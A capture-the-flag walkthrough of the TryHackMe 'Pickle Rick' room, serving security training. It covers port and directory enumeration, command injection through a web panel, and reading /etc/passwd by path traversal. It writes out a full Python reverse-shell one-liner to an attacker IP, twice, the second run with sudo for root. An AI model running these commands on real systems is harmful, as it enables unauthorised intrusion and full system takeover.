Pickle Rick — TryHackMe Walkthrough

Pickle Rick

Hi! Today we are solving Pickle Rick on TryHackMe, which is an easy-rated room based around the theme of the TV show Rick and Morty. To crack this room we’ll exploit the command injection vulnerability found on the web server.

Room Link: https://tryhackme.com/room/picklerick

TryHackMe | Pickle Rick

Lets get started!

Let us first add our target ip to /etc/hosts :

/etc/hosts

Step 0: Reconnaissance

We must discover the open ports on our target’s machine. For this task I’ll use Nmap(network mapper) which is a popular tool used by pentesters for target enumeration.

sudo nmap -sC -sV -oN logs/initial_nmap rick.thm

1. -sC — to run the default set of script scans for a target host.
2. -sV — to enable version detection for target host.
3. -oN — to save the output in normal format.

nmap scan

Brief

1. 22/tcp — SSH(Secure Shell) — used for secure remote access to systems, we must find a username and password of ssh to get access of the target machine.
2. 80/tcp — HTTP server — running an Apache 2.4.18 web server.

Step 1: Exploring web server

Let us visit the website running on port 80(HTTP protocol) and check for important information.

web server

On the surface, it looks like a normal web page. Lets inspect the source code for any clues.

source code

There’s a comment that gives us a username(R1ckRul3s) which can be used to log into the ssh server or somewhere else. Now let’s check the robots.txt file if it gives us any directories.

robots.txt

Weird! Its some random gibberish, its not even a directory.

We haven’t got anything juicy as of now. Let us now enumerate the web server to get all the existing directories/files on it. We’ll use gobuster for this task — gobuster is a software tool for brute forcing directories/files on web servers.

gobuster dir -u http://rick.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

gobuster initial scan

No luck! Lets run it again but now with a different wordlist and also check for .php and .html extensions.

gobuster dir -u http://rick.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html

gobuster 2nd scan

Discovered what seems to be like a login page and a portal which requires authentication through the login page.

login.php

Lets use the username from the source code and gibberish from the robots.txt file to log in.

portal.php

And we discovered a command panel. Looks like we can do some command injection to compromise this machine.

Tried a path traversal with cat ../../../etc/passwd but the cat command is disabled:

path traversal with cat command

Lets try with less command.

path traversal with less command

And the command injection works!

Step 2: Compromising the system

Lets start a netcat listener on our attack machine and get a shell through command injection. Here’s how to do it:

On attack machine:

nc -nl8vp 9001

On command panel:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.101.143",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Reverse shell

Bingo! we’re in…

But before moving forward let us stabilize the shell:

commands to stabilize the shell

Now we have a fully interactive shell.

Lets grab the first ingredient(flag):

first ingredient

Lets check what clue we have:

clue.txt

Gotta navigate around the file system now!

/home

In the home directory we find 2 users — Ubuntu and Rick.

second ingredient

Inside Rick’s file system, we get the second ingredient.

Step 3: Privilege Escalation

Lets check what commands can our current user execute as root user using the sudo -l command:

sudo -l

We can execute all the commands with sudo without the need of a password. Thats a crazy blunder! Such misconfigurations make the system easy to be exploited.

Lets abuse this by spawning another reverse shell on our machine but this time we’ll send the request to our listener with root privileges:

On attack machine

nc -nlvp 4444

2nd netcat listener

On target machine

sudo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.101.143",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

On the netcat listener we get our privileged shell after executing the reverse shell code:

rooted reverse shell

pwned!!!

We got all the three ingredients, Lets hope that Rick now turns back to human.

Conclusion

Pickle Rick is a fun thematic room which requires knowledge of web exploitation and privilege escalation. Despite this being an easy-rated room, some may find it a bit difficult, I personally struggled with the web enumeration part where I was supposed to discover the command panel which was vulnerable to command injection attack.

References

1. https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/full-ttys

Happy Hacking!